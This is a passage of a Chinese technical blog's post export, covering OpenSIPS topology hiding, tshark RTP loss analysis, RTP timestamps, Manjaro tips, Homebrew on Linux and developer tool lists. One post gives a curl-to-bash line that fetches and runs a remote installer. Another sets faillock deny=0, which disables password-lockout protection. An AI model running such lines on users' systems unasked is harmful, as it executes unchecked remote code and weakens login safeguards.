8G内存,128硬盘的。\n有些人可能惊讶,128G的硬盘怎么能够用的。但是我的确够用,我的磁盘还有将近50G的剩余空间呢。\n我不是视频或者影音工作者,用的软件比较少。整个应用程序所占用的空间才4个多G。剩下的文稿可能大部分是代码。\n由于我基本上都是远程用ssh连上nuc上开发,所以mac上的资料更少。\n但是macbook键盘坏了这个问题,是不能忍的。偶尔要移动办公的时候,不可能再带个外接键盘吧。\n是时候准备和陪伴我4.5年的电脑说再见了。\n本来想买14寸的macbook pro m1的,但是重量的增加以及很丑的刘海也是我不能忍的。\n所以我觉得我会买一台轻便点的windows笔记本,而且windows还有一个很吸引我的点,就是linux子系统。这个linux子系统,要比mac的系统更加linux。\n各位同学有没有推荐的windows的轻便笔记本呢?\n","permalink":"https://wdd.js.org/posts/2022/04/er3vob/","summary":"我之前写过一篇文章《macbook pro使用三年后的感受》,今天这篇文章是使用4.5年的感受。\n再次梳理一下,中间遇到过的问题\n蝴蝶键盘很早就有些问题了,最近疫情在家,键盘被用坏了,J键直接坏了。只能外接键盘来用 屏幕下方出现淡红色的纹路,不太明显,基本不影响使用 中间我自己给macbook换过一次电池,换电池之前只要不插电,macbook很容易就关机了 风扇经常转,噪音有点吵,我已经觉得无所谓了 17年买这台电脑的时候,应该是9400左右。配置应该是最低配的 i5双核2.3Ghz, 8G内存,128硬盘的。\n有些人可能惊讶,128G的硬盘怎么能够用的。但是我的确够用,我的磁盘还有将近50G的剩余空间呢。\n我不是视频或者影音工作者,用的软件比较少。整个应用程序所占用的空间才4个多G。剩下的文稿可能大部分是代码。\n由于我基本上都是远程用ssh连上nuc上开发,所以mac上的资料更少。\n但是macbook键盘坏了这个问题,是不能忍的。偶尔要移动办公的时候,不可能再带个外接键盘吧。\n是时候准备和陪伴我4.5年的电脑说再见了。\n本来想买14寸的macbook pro m1的,但是重量的增加以及很丑的刘海也是我不能忍的。\n所以我觉得我会买一台轻便点的windows笔记本,而且windows还有一个很吸引我的点,就是linux子系统。这个linux子系统,要比mac的系统更加linux。\n各位同学有没有推荐的windows的轻便笔记本呢?","title":"macbook pro 使用1664天的感受"},{"content":"1. 拓扑隐藏功能 删除Via头 删除Route 删除Record-Route 修改Contact 可选隐藏Call-ID 如下图所示,根据SIP的Via, Route, Record-Route的头,往往可以推测服务内部的网络结构。\n我们不希望别人知道我们的内部网络结构。我们只希望别人只能看到C这个sip server。经过拓扑隐藏过后\n用户看不到关于a、b的via, route, record-route头 用户看到的Contact头被修改成C的IP地址 可以选择把原始的Call-ID也修改 当然,拓扑隐藏除了可以隐藏一些信息,也有一个其他的好处:减少SIP消息包的长度。如果SIP消息用UDP传输,减少包的体积,可以大大降低UDP分片的可能性。\n所以,综上所述:拓扑隐藏有以下好处\n隐藏服务内部网络结构 减少SIP包的体积 2. 
脚本例子 拓扑隐藏的实现并不复杂。首先要加载拓扑隐藏的模块\nloadmodule \u0026#34;topology_hiding.so\u0026#34; 2.1 初始化路由的处理 在初始化路由里,只需要调用topology_hiding()\nU 表示不隐藏Contact的用户名信息 C 表示隐藏Call-ID # if it\u0026#39;s an INVITE dialog, we can create the dialog now, will lead to cleaner SIP messages if (is_method(\u0026#34;INVITE\u0026#34;)) create_dialog(); # we do topology hiding, preserving the Contact Username and also hiding the Call-ID topology_hiding(\u0026#34;UC\u0026#34;); t_relay(); exit; 2.2 序列化路由的处理 在序列化请求中,只需要调用topology_hiding_match(), 后续的就可以交给OpenSIPS处理了。\nif (has_totag()) { if (topology_hiding_match()) { xlog(\u0026#34;Succesfully matched this request to a topology hiding dialog. \\n\u0026#34;); xlog(\u0026#34;Calller side callid is $ci \\n\u0026#34;); xlog(\u0026#34;Callee side callid is $TH_callee_callid \\n\u0026#34;); t_relay(); exit; } else { if ( is_method(\u0026#34;ACK\u0026#34;) ) { if ( t_check_trans() ) { t_relay(); exit; } else exit; } sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } } 2.3 注意事项 如果用了拓扑隐藏,就不要用record_route()用record_route_preset(), 去设置Record-Route头了,否则SIP消息将会在sip server上一只循环发送。\n4. 参考文档 https://www.opensips.org/Documentation/Tutorials-Topology-Hiding https://opensips.org/html/docs/modules/2.1.x/topology_hiding.html#idp256096 ","permalink":"https://wdd.js.org/opensips/ch8/topology-hiding/","summary":"1. 拓扑隐藏功能 删除Via头 删除Route 删除Record-Route 修改Contact 可选隐藏Call-ID 如下图所示,根据SIP的Via, Route, Record-Route的头,往往可以推测服务内部的网络结构。\n我们不希望别人知道的我们的内部网络结构。我们只希望只能看到C这个sip server。经过拓扑隐藏过后\n用户看不到关于a、b的via, route, record-route头 用户看到的Contact头被修改成C的IP地址 可以选择把原始的Call-ID也修改 当然,拓扑隐藏除了可以隐藏一些信息,也有一个其他的好处:减少SIP消息包的长度。如果SIP消息用UDP传输,减少包的体积,可以大大降低UDP分片的可能性。\n所以,综上所述:拓扑隐藏有以下好处\n隐藏服务内部网络结构 减少SIP包的体积 2. 
脚本例子 拓扑隐藏的实现并不复杂。首先要加载拓扑隐藏的模块\nloadmodule \u0026#34;topology_hiding.so\u0026#34; 2.1 初始化路由的处理 在初始化路由里,只需要调用topology_hiding()\nU 表示不隐藏Contact的用户名信息 C 表示隐藏Call-ID # if it\u0026#39;s an INVITE dialog, we can create the dialog now, will lead to cleaner SIP messages if (is_method(\u0026#34;INVITE\u0026#34;)) create_dialog(); # we do topology hiding, preserving the Contact Username and also hiding the Call-ID topology_hiding(\u0026#34;UC\u0026#34;); t_relay(); exit; 2.","title":"拓扑隐藏学习以及实践"},{"content":"我有一个github仓库,https://github.com/wangduanduan/opensips, 这个源码比较大,git clone 比较慢。\n我们使用https://www.gitclone.com/提供的加速服务。\n# 从github上clone git clone https://github.com/wangduanduan/opensips.git # 从gitclone上clone # 只需要在github前面加上gitclone.com/ # 速度就非常快,达到1mb/s git clone https://gitclone.com/github.com/wangduanduan/opensips.git 但是这时候git repo的仓库地址是 https://gitclone.com/github.com/wangduanduan/opensips.git,并不是真正的仓库地址,而且我更喜欢用的是ssh方式的远程地址,所以我们就需要修改一下\ngit remote set-url origin git@github.com:wangduanduan/opensips.git ","permalink":"https://wdd.js.org/posts/2022/03/sny4rb/","summary":"我有一个github仓库,https://github.com/wangduanduan/opensips, 这个源码比较大,git clone 比较慢。\n我们使用https://www.gitclone.com/提供的加速服务。\n# 从github上clone git clone https://github.com/wangduanduan/opensips.git # 从gitclone上clone # 只需要在github前面加上gitclone.com/ # 速度就非常快,达到1mb/s git clone https://gitclone.com/github.com/wangduanduan/opensips.git 但是这时候git repo的仓库地址是 https://gitclone.com/github.com/wangduanduan/opensips.git,并不是真正的仓库地址,而且我更喜欢用的是ssh方式的远程地址,所以我们就需要修改一下\ngit remote set-url origin git@github.com:wangduanduan/opensips.git ","title":"github clone加速"},{"content":"故事发生在1988年的美国。这一年互联网的始祖网络,阿帕网已经诞生了将近20年。而我们所熟知的linux将在三年后,也就是1991才出现。\n在1988年,这时候的互联网只有阿帕网。 然而这个网络并没有想象中的那么好用,他还存在很多问题,而且也经常崩溃。\n解决阿帕网崩溃的这个问题,落到了LBL(Lawrence Berkeley National Laboratory实验室的肩上。\n这个实验室有四个牛人,他们同时也是tcpdump的发明人。\nVan Jacobson Sally Floyd Vern Paxson Steve McCanne 
这个实验室主要的研究方向是TCP拥塞控制、BSD包过滤、VoIP等方向。\n为了解决阿帕网经常崩溃的问题,就必须要有一个好用的抓包工具。\n本着不重复造轮子的原则,这时候已经有了一个叫做etherfind的工具,但是这个工具有以下的问题\n包过滤的语法非常蹩脚 协议编解码能力非常弱 性能也非常弱 总之一句话,他们认为etherfind不行。\n工欲善其事,必先利其器。所以他们就想创造一个新的工具。这个工具必须要有以下的特征\n能够从协议栈底层过滤包 能够把高级的过滤语法编译成底层的代码 能够在驱动层进行过滤 创建了一个内核模块叫做 Berkeley Packet Filter(BPF) 参考 https://baike.baidu.com/item/ARPAnet/3562284 ","permalink":"https://wdd.js.org/posts/2022/03/tcpdump/","summary":"故事发生在1988年的美国。这一年互联网的始祖网络,阿帕网已经诞生了将近20年。而我们所熟知的linux将在三年后,也就是1991才出现。\n在1988年,这时候的互联网只有阿帕网。 然而这个网络并没有想象中的那么好用,它还存在很多问题,而且也经常崩溃。\n解决阿帕网崩溃的这个问题,落到了LBL(Lawrence Berkeley National Laboratory)实验室的肩上。\n这个实验室有四个牛人,他们同时也是tcpdump的发明人。\nVan Jacobson Sally Floyd Vern Paxson Steve McCanne 这个实验室主要的研究方向是TCP拥塞控制、BSD包过滤、VoIP等方向。\n为了解决阿帕网经常崩溃的问题,就必须要有一个好用的抓包工具。\n本着不重复造轮子的原则,这时候已经有了一个叫做etherfind的工具,但是这个工具有以下的问题\n包过滤的语法非常蹩脚 协议编解码能力非常弱 性能也非常弱 总之一句话,他们认为etherfind不行。\n工欲善其事,必先利其器。所以他们就想创造一个新的工具。这个工具必须要有以下的特征\n能够从协议栈底层过滤包 能够把高级的过滤语法编译成底层的代码 能够在驱动层进行过滤 创建了一个内核模块叫做 Berkeley Packet Filter(BPF) 参考 https://baike.baidu.com/item/ARPAnet/3562284 ","title":"[未完成] 浪潮之底系列 - tcpdump的故事"},{"content":"wireshark安装之后,tshark也会自动安装。tshark也可以单独安装。\n如果我们想快速的分析语音流相关的问题,可以参考下面的一个命令。\n语音卡顿,常见的原因就是网络丢包,tshark在命令行中快速输出语音流的丢包率。\n如下所示,rtp的丢包率分别是2.5%和4.6%。\ntshark -r abc.pcap -q -z rtp,streams ========================= RTP Streams ======================== Start time End time Src IP addr Port Dest IP addr Port SSRC Payload Pkts Lost Min Delta(ms) Mean Delta(ms) Max Delta(ms) Min Jitter(ms) Mean Jitter(ms) Max Jitter(ms) Problems? 2.666034 60.446026 192.168.69.12 18892 192.168.68.111 26772 0x76EFFF66 g711A 2807 72 (2.5%) 0.011 20.592 120.002 0.001 0.074 2.430 X 0.548952 60.467686 192.168.68.111 26772 192.168.69.12 18892 0xA655E7B6 g711A 2215 106 (4.6%) 9.520 21.202 219.777 0.055 6.781 256.014 X ============================================================== tshark的-z参数 -z参数可以用来提取各种统计数据。\n-z Get TShark to collect various types of statistics and display the result after finishing reading the capture file. 
Use the -q option if you’re reading a capture file and only want the statistics printed, not any per-packet information. Statistics are calculated independently of the normal per-packet output, unaffected by the main display filter. However, most have their own optional filter parameter, and only packets that match that filter (and any capture filter or read filter) will be used in the calculations. Note that the -z proto option is different - it doesn’t cause statistics to be gathered and printed when the capture is complete, it modifies the regular packet summary output to include the values of fields specified with the option. Therefore you must not use the -q option, as that option would suppress the printing of the regular packet summary output, and must also not use the -V option, as that would cause packet detail information rather than packet summary information to be printed. tshark -z help可以打\ntshark -z help 常用的\n-z conv,tcp-z conv,ip-z conv,udp-z endpoints,type[,filter]-z expert,sip-z sip,stat-z ip_hosts,tree-z rtp,streams\n","permalink":"https://wdd.js.org/opensips/tools/tshark/","summary":"wireshark安装之后,tshark也会自动安装。tshark也可以单独安装。\n如果我们想快速的分析语音刘相关的问题,可以参考下面的一个命令。\n语音卡顿,常见的原因就是网络丢包,tshark在命令行中快速输出语音流的丢包率。\n如下所示,rtp的丢包率分别是2.5%和4.6%。\ntshark -r abc.pcap -q -z rtp,streams ========================= RTP Streams ======================== Start time End time Src IP addr Port Dest IP addr Port SSRC Payload Pkts Lost Min Delta(ms) Mean Delta(ms) Max Delta(ms) Min Jitter(ms) Mean Jitter(ms) Max Jitter(ms) Problems? 
2.666034 60.446026 192.168.69.12 18892 192.168.68.111 26772 0x76EFFF66 g711A 2807 72 (2.5%) 0.011 20.592 120.002 0.001 0.074 2.430 X 0.548952 60.467686 192.168.68.111 26772 192.168.69.12 18892 0xA655E7B6 g711A 2215 106 (4.","title":"tshark 快速分析语音流问题"},{"content":"对于浏览器,我有以下几个需求\n能在所有平台上运行,包括mac, windows, linux, ios, 安卓 能够非常方便的同步浏览器之间的数据,例如书签之类的 能够很方便的安装扩展程序,无需翻墙 按照这些条件,只有Firefox能否满足。\n当然安装使用Firefox的时候,也出现了几小插曲。\nmacos 我在ios上登录Firefox上的账户,在MacOS的Firefox却无法登陆,查了才发现,原来FireFox的账号分为国内版和国际版,两者之间数据不通,所以在macos上,也要登陆国内版本,就是带有火狐通行证的登陆页面。\n需要在同步页面点击切换至本地服务。\nlinux/manjaro manjaro上安装的firefox居然没有切换本地服务这个选项,后来发现这个浏览器上没有附加组件管理器所以需要去 http://mozilla.com.cn/moz-addon.html, 安装好附加组件管理器,登陆的时候,应该就可以跳转到带有火狐通行证的登陆页面了。\n","permalink":"https://wdd.js.org/posts/2020/02/yva0h1/","summary":"对于浏览器,我有以下几个需求\n能在所有平台上运行,包括mac, windows, linux, ios, 安卓 能够非常方便的同步浏览器之间的数据,例如书签之类的 能够很方便的安装扩展程序,无需翻墙 按照这些条件,只有Firefox能否满足。\n当然安装使用Firefox的时候,也出现了几小插曲。\nmacos 我在ios上登录Firefox上的账户,在MacOS的Firefox却无法登陆,查了才发现,原来FireFox的账号分为国内版和国际版,两者之间数据不通,所以在macos上,也要登陆国内版本,就是带有火狐通行证的登陆页面。\n需要在同步页面点击切换至本地服务。\nlinux/manjaro manjaro上安装的firefox居然没有切换本地服务这个选项,后来发现这个浏览器上没有附加组件管理器所以需要去 http://mozilla.com.cn/moz-addon.html, 安装好附加组件管理器,登陆的时候,应该就可以跳转到带有火狐通行证的登陆页面了。","title":"为什么我又开始使用Firefox浏览器"},{"content":"1. datamash https://www.gnu.org/software/datamash/ 能够方便的计算数据的平均值,最大值,最小值等数据。\n2. textsql https://github.com/dinedal/textql 能够方便的对csv文件做sql查询\n3. graph-cli https://github.com/mcastorina/graph-cli 能够直接读取csv文件,然后绘图。\n","permalink":"https://wdd.js.org/posts/2022/02/","summary":"1. datamash https://www.gnu.org/software/datamash/ 能够方便的计算数据的平均值,最大值,最小值等数据。\n2. textsql https://github.com/dinedal/textql 能够方便的对csv文件做sql查询\n3. 
graph-cli https://github.com/mcastorina/graph-cli 能够直接读取csv文件,然后绘图。","title":"有意思的命令行工具"},{"content":"OpenSIPS需要用数据库持久化数据,常用的是mysql。\n可以参考这个官方的教程去初始化数据库的数据 https://www.opensips.org/Documentation/Install-DBDeployment-2-4\n如果你想自己创建语句,也是可以的,实际上建表语句在OpenSIPS安装之后,已经被保存在你的电脑上。\n一般位于 /usr/local/share/opensips/mysql 目录中\ncd /usr/local/share/opensips/mysql ls acc-create.sql call_center-create.sql dispatcher-create.sql group-create.sql rls-create.sql uri_db-create.sql alias_db-create.sql carrierroute-create.sql domain-create.sql imc-create.sql rtpengine-create.sql userblacklist-create.sql auth_db-create.sql closeddial-create.sql domainpolicy-create.sql load_balancer-create.sql rtpproxy-create.sql usrloc-create.sql avpops-create.sql clusterer-create.sql drouting-create.sql msilo-create.sql siptrace-create.sql b2b-create.sql cpl-create.sql emergency-create.sql permissions-create.sql speeddial-create.sql b2b_sca-create.sql dialog-create.sql fraud_detection-create.sql presence-create.sql standard-create.sql cachedb_sql-create.sql dialplan-create.sql freeswitch_scripting-create.sql registrant-create.sql tls_mgm-create.sql ","permalink":"https://wdd.js.org/opensips/ch5/sql-table/","summary":"OpenSIPS需要用数据库持久化数据,常用的是mysql。\n可以参考这个官方的教程去初始化数据库的数据 https://www.opensips.org/Documentation/Install-DBDeployment-2-4\n如果你想自己创建语句,也是可以的,实际上建表语句在OpenSIPS安装之后,已经被保存在你的电脑上。\n一般位于 /usr/local/share/opensips/mysql 目录中\ncd /usr/local/share/opensips/mysql ls acc-create.sql call_center-create.sql dispatcher-create.sql group-create.sql rls-create.sql uri_db-create.sql alias_db-create.sql carrierroute-create.sql domain-create.sql imc-create.sql rtpengine-create.sql userblacklist-create.sql auth_db-create.sql closeddial-create.sql domainpolicy-create.sql load_balancer-create.sql rtpproxy-create.sql usrloc-create.sql avpops-create.sql clusterer-create.sql drouting-create.sql msilo-create.sql siptrace-create.sql b2b-create.sql cpl-create.sql emergency-create.sql permissions-create.sql speeddial-create.sql 
b2b_sca-create.sql dialog-create.sql fraud_detection-create.sql presence-create.sql standard-create.sql cachedb_sql-create.sql dialplan-create.sql freeswitch_scripting-create.sql registrant-create.sql tls_mgm-create.sql ","title":"mysql建表语句"},{"content":"1. 安装vivaldi浏览器 pamac install vivaldi 参考:https://wiki.manjaro.org/index.php/Vivaldi_Browser\n2. 关闭三次密码错误锁定 修改/etc/security/faillock.conf, 将其中的deny取消注释,并改为0,然后注销。重新登录。\ndeny = 0 3. 禁用大写锁定键 在输入设备中,选择键盘-》高级》 Caps Lock行为, 选中Caps Lock被禁用, 然后应用。\n","permalink":"https://wdd.js.org/posts/2022/01/","summary":"1. 安装vivaldi浏览器 pamac install vivaldi 参考:https://wiki.manjaro.org/index.php/Vivaldi_Browser\n2. 关闭三次密码错误锁定 修改/etc/security/faillock.conf, 将其中的deny取消注释,并改为0,然后注销。重新登录。\ndeny = 0 3. 禁用大写锁定键 在输入设备中,选择键盘-》高级》 Caps Lock行为, 选中Caps Lock被禁用, 然后应用。","title":"manjaro kde 之旅"},{"content":"最近遇到一些和媒体流相关的问题,使用wireshark分析之后,总算有些眉目。然而我深感对RTP协议的理解,还是趋于表面。所以我决定,深入的学习一下RTP协议。\n和rtp相关的协议有两个rfc, 分别是\n1996的的 RFC 1889 2003年的 RFC 3550 RFC 3550是对RFC 1889的稍微改进,然而大体上是没什么改变的。所以我们可以直接看RFC 3550。\nRTP 底层用的是UDP协议 RTP 的使用场景是传输实时数据,例如语音,视频,模拟数据等等 RTP 并不保证QoS Synchronization source (SSRC): The source of a stream of RTP packets, identified by a 32-bit numeric SSRC identifier carried in the RTP header so as not to be dependent upon the network address. All packets from a synchronization source form part of the same timing and sequence number space, so a receiver groups packets by synchronization source for playback. Examples of synchronization sources include the sender of a stream of packets derived from a signal source such as a microphone or a camera, or an RTP mixer (see below). A synchronization source may change its data format, e.g., audio encoding, over time. The SSRC identifier is a randomly chosen value meant to be globally unique within a particular RTP session (see Section 8). 
A participant need not use the same SSRC identifier for all the RTP sessions in a multimedia session; the binding of the SSRC identifiers is provided through RTCP (see Section 6.5.1). If a participant generates multiple streams in one RTP session, for example from separate video cameras, each MUST be identified as a different SSRC.\nThe first twelve octets are present in every RTP packet, while the list of CSRC identifiers is present only when inserted by a mixer. The fields have the following meaning:\nversion (V): 2 bits This field identifies the version of RTP. The version defined by this specification is two (2). (The value 1 is used by the first draft version of RTP and the value 0 is used by the protocol initially implemented in the \u0026ldquo;vat\u0026rdquo; audio tool.)\npadding (P): 1 bit If the padding bit is set, the packet contains one or more additional padding octets at the end which are not part of the payload. The last octet of the padding contains a count of how many padding octets should be ignored, including itself. Padding may be needed by some encryption algorithms with fixed block sizes or for carrying several RTP packets in a lower-layer protocol data unit.\nextension (X): 1 bit If the extension bit is set, the fixed header MUST be followed by exactly one header extension, with a format defined in Section 5.3.1.\nCSRC count (CC): 4 bits The CSRC count contains the number of CSRC identifiers that follow the fixed header.\nmarker (M): 1 bit The interpretation of the marker is defined by a profile. It is intended to allow significant events such as frame boundaries to be marked in the packet stream. A profile MAY define additional marker bits or specify that there is no marker bit by changing the number of bits in the payload type field (see Section 5.3).\npayload type (PT): 7 bits This field identifies the format of the RTP payload and determines its interpretation by the application. 
A profile MAY specify a default static mapping of payload type codes to payload formats. Additional payload type codes MAY be defined dynamically through non-RTP means (see Section 3). A set of default mappings for audio and video is specified in the companion RFC 3551 [1]. An RTP source MAY change the payload type during a session, but this field SHOULD NOT be used for multiplexing separate media streams (see Section 5.2). A receiver MUST ignore packets with payload types that it does not understand.\nsequence number: 16 bits The sequence number increments by one for each RTP data packet sent, and may be used by the receiver to detect packet loss and to restore packet sequence. The initial value of the sequence number SHOULD be random (unpredictable) to make known-plaintext attacks on encryption more difficult, even if the source itself does not encrypt according to the method in Section 9.1, because the packets may flow through a translator that does. Techniques for choosing unpredictable numbers are discussed in [17].\ntimestamp: 32 bits 最重要的就是这个字段,需要认证理解。\ntimestamp的初始值是一个随机值,而不是linux时间戳 timestamp反应的是rtp采样数据的一个字节的采样时刻 对于相同的rtp流来说,timestamp总是线性按照固定的长度增长,一般是160。采样频率一般是8000hz, 也就是说1秒会有8000个样本数据,每个样本占用1个字节。发送方一般每隔20毫秒发送一个20毫秒内的所有采样数据。那么一秒钟发送方会发送1000/20=50个RTP包,50个数据包发送8000个采样数据,平均每隔数据包携带8000/50=160个字节的数据。所以timestamp的增量一般是160, 在wireshark上抓包,可以看到rtc流的time字段是按照160的步长在增加。 然后我们分析单个的RTP流,从IP层可以看出UDP payload是172个字节,实际上就是rtp的采样数据160 + RTP的固定的12字节的头部 但是也有时候, timestamp也并不是总是按照固定的步长再增长,例如下图,3166508092的下一个包的Time字段突然变成1307389520了。这种情况比较特殊,一般是多个不同SSRC的语音流再经过同一个SBC时,SSRC被修改成相同的值,但是timestamp字段是原样保留的。导致发出的RTP流timestamp字段不再连续。在wireshark的流分析上,也能看出出现了不正常的timestamp。这种不正常的timestamp对于某些sipua来说,它可能会忽略不连续的所有后续的RTP包,进而导致无法放音的问题。我就层遇到过fs类似的问题,一个解决方案是升级fs, 另一个方案是试下 fs的rtp_rewrite_timestamps通道变量为true。https://freeswitch.org/confluence/display/FREESWITCH/rtp_rewrite_timestamps The timestamp reflects the sampling instant of the first octet in the RTP data packet. 
The sampling instant MUST be derived from a clock that increments monotonically and linearly in time to allow synchronization and jitter calculations (see Section 6.4.1). The resolution of the clock MUST be sufficient for the desired synchronization accuracy and for measuring packet arrival jitter (one tick per video frame is typically not sufficient). The clock frequency is dependent on the format of data carried as payload and is specified statically in the profile or payload format specification that defines the format, or MAY be specified dynamically for payload formats defined through non-RTP means. If RTP packets are generated periodically, the nominal sampling instant as determined from the sampling clock is to be used, not a reading of the system clock. As an example, for fixed-rate audio the timestamp clock would likely increment by one for each sampling period. If an audio application reads blocks covering 160 sampling periods from the input device, the timestamp would be increased by 160 for each such block, regardless of whether the block is transmitted in a packet or dropped as silent. The initial value of the timestamp SHOULD be random, as for the sequence number. Several consecutive RTP packets will have equal timestamps if they are (logically) generated at once, e.g., belong to the same video frame. Consecutive RTP packets MAY contain timestamps that are not monotonic if the data is not transmitted in the order it was sampled, as in the case of MPEG interpolated video frames. (The sequence numbers of the packets as transmitted will still be monotonic.) RTP timestamps from different media streams may advance at different rates and usually have independent, random offsets. Therefore, although these timestamps are sufficient to reconstruct the timing of a single stream, directly comparing RTP timestamps from different media is not effective for synchronization. 
Instead, for each medium the RTP timestamp is related to the sampling instant by pairing it with a timestamp from a reference clock (wallclock) that represents the time when the data corresponding to the RTP timestamp was sampled. The reference clock is shared by all media to be synchronized. The timestamp pairs are not transmitted in every data packet, but at a lower rate in RTCP SR packets as described in Section 6.4. The sampling instant is chosen as the point of reference for the RTP timestamp because it is known to the transmitting endpoint and has a common definition for all media, independent of encoding delays or other processing. The purpose is to allow synchronized presentation of all media sampled at the same time. Applications transmitting stored data rather than data sampled in real time typically use a virtual presentation timeline derived from wallclock time to determine when the next frame or other unit of each medium in the stored data should be presented. In this case, the RTP timestamp would reflect the presentation time for each unit. That is, the RTP timestamp for each unit would be related to the wallclock time at which the unit becomes current on the virtual presentation timeline. Actual presentation occurs some time later as determined by the receiver. An example describing live audio narration of prerecorded video illustrates the significance of choosing the sampling instant as the reference point. In this scenario, the video would be presented locally for the narrator to view and would be simultaneously transmitted using RTP. The \u0026ldquo;sampling instant\u0026rdquo; of a video frame transmitted in RTP would be established by referencing\nits timestamp to the wallclock time when that video frame was presented to the narrator. The sampling instant for the audio RTP packets containing the narrator\u0026rsquo;s speech would be established by referencing the same wallclock time when the audio was sampled. 
The audio and video may even be transmitted by different hosts if the reference clocks on the two hosts are synchronized by some means such as NTP. A receiver can then synchronize presentation of the audio and video packets by relating their RTP timestamps using the timestamp pairs in RTCP SR packets.\nSSRC: 32 bits The SSRC field identifies the synchronization source. This identifier SHOULD be chosen randomly, with the intent that no two synchronization sources within the same RTP session will have the same SSRC identifier. An example algorithm for generating a random identifier is presented in Appendix A.6. Although the probability of multiple sources choosing the same identifier is low, all RTP implementations must be prepared to detect and resolve collisions. Section 8 describes the probability of collision along with a mechanism for resolving collisions and detecting RTP-level forwarding loops based on the uniqueness of the SSRC identifier. If a source changes its source transport address, it must also choose a new SSRC identifier to avoid being interpreted as a looped source (see Section 8.2).\nCSRC list: 0 to 15 items, 32 bits each The CSRC list identifies the contributing sources for the payload contained in this packet. The number of identifiers is given by the CC field. If there are more than 15 contributing sources, only 15 can be identified. CSRC identifiers are inserted by mixers (see Section 7.1), using the SSRC identifiers of contributing sources. 
For example, for audio packets the SSRC identifiers of all sources that were mixed together to create a packet are listed, allowing correct talker indication at the receiver.\n参考文档 http://www.rfcreader.com/#rfc3550 http://www.rfcreader.com/#rfc1889 ","permalink":"https://wdd.js.org/opensips/ch4/rtp-timestamp/","summary":"最近遇到一些和媒体流相关的问题,使用wireshark分析之后,总算有些眉目。然而我深感对RTP协议的理解,还是趋于表面。所以我决定,深入的学习一下RTP协议。\n和rtp相关的协议有两个rfc, 分别是\n1996年的 RFC 1889 2003年的 RFC 3550 RFC 3550是对RFC 1889的稍微改进,然而大体上是没什么改变的。所以我们可以直接看RFC 3550。\nRTP 底层用的是UDP协议 RTP 的使用场景是传输实时数据,例如语音,视频,模拟数据等等 RTP 并不保证QoS Synchronization source (SSRC): The source of a stream of RTP packets, identified by a 32-bit numeric SSRC identifier carried in the RTP header so as not to be dependent upon the network address. All packets from a synchronization source form part of the same timing and sequence number space, so a receiver groups packets by synchronization source for playback.","title":"RTP 不连续的timestamp和SSRC"},{"content":"要求 [必须] 能够保存密码, 或者用私钥登录 [必须] 能够支持ftp/sftp [必须] 开源免费 [必须] 界面漂亮,支持中文字符 [可选] 支持同步ssh配置 [必须] 支持跨平台 Tabby A terminal for a more modern age (formerly Terminus) https://github.com/Eugeny/tabby https://tabby.sh/ 25.7k Star 基于electron, 主要开发语言typescript\nElecterm Terminal/ssh/sftp client(linux, mac, win) https://github.com/electerm/electerm https://electerm.github.io/electerm/ 4.8k star 基于electron, 主要开发语言javascript\nWindTerm A Quicker and better SSH/Telnet/Serial/Shell/Sftp client for DevOps.\nhttps://github.com/kingToolbox/WindTerm 2.6K star 主要开发语言: C\n","permalink":"https://wdd.js.org/posts/2021/12/","summary":"要求 [必须] 能够保存密码, 或者用私钥登录 [必须] 能够支持ftp/sftp [必须] 开源免费 [必须] 界面漂亮,支持中文字符 [可选] 支持同步ssh配置 [必须] 支持跨平台 Tabby A terminal for a more modern age (formerly Terminus) https://github.com/Eugeny/tabby https://tabby.sh/ 25.7k Star 基于electron, 主要开发语言typescript\nElecterm Terminal/ssh/sftp client(linux, mac, win) https://github.com/electerm/electerm https://electerm.github.io/electerm/ 4.8k star 基于electron, 
主要开发语言javascript\nWindTerm A Quicker and better SSH/Telnet/Serial/Shell/Sftp client for DevOps.\nhttps://github.com/kingToolbox/WindTerm 2.6K star 主要开发语言: C","title":"开源免费的ssh终端工具"},{"content":"11月2号,我的主力开发工具macbook开始退役。\n我换了nuc11 i7, 安装了国产的deepin(深度)操作系统。总体体验蛮好的,只是apt-get的软件包里,太多都是很老的包。所以我想到以前用mac的包管理工具homebrew, 据说它不仅仅可以在mac上工作,主流的linux也是能够使用的。\nhomebrew的介绍是:The Missing Package Manager for macOS (or Linux)。也就是说brew完全可以在linux上运行。\n安装方式也很简单:\n/bin/bash -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\u0026#34; 上面的shell执行之后,brew就安装成功了。\n和mac不同的是,linux homebrew的安装包的可执行命令的目录是:/home/linuxbrew/.linuxbrew/bin, 所以需要把它加入到PATH中,安装的软件才能正确执行。\n参考 https://brew.sh/ ","permalink":"https://wdd.js.org/posts/2021/11/","summary":"11月2号,我的主力开发工具macbook开始退役。\n我换了nuc11 i7, 安装了国产的deepin(深度)操作系统。总体体验蛮好的,只是apt-get的软件包里,太多都是很老的包。所以我想到以前用mac的包管理工具homebrew, 据说它不仅仅可以在mac上工作,主流的linux也是能够使用的。\nhomebrew的介绍是:The Missing Package Manager for macOS (or Linux)。也就是说brew完全可以在linux上运行。\n安装方式也很简单:\n/bin/bash -c \u0026#34;$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)\u0026#34; 上面的shell执行之后,brew就安装成功了。\n和mac不同的是,linux homebrew的安装包的可执行命令的目录是:/home/linuxbrew/.linuxbrew/bin, 所以需要把它加入到PATH中,安装的软件才能正确执行。\n参考 https://brew.sh/ ","title":"使用brew作为deepin的包管理工具"},{"content":"web框架 https://github.com/gofiber/fiber http client https://github.com/go-resty/resty mock https://github.com/jarcoal/httpmock 项目结构 https://github.com/golang-standards/project-layout 环境变量操作 https://github.com/caarlos0/env https://github.com/kelseyhightower/envconfig 测试框架 https://github.com/stretchr/testify 日志框架 https://github.com/uber-go/zap html解析 https://github.com/PuerkitoBio/goquery cli工具 https://github.com/urfave/cli 各种库大全集 https://github.com/avelino/awesome-go 终端颜色 https://github.com/fatih/color 剪贴板 https://github.com/atotto/clipboard 数据库驱动 https://github.com/go-sql-driver/mysql 热重载 https://github.com/cosmtrek/air 时间处理 https://github.com/golang-module/carbon 错误封装 
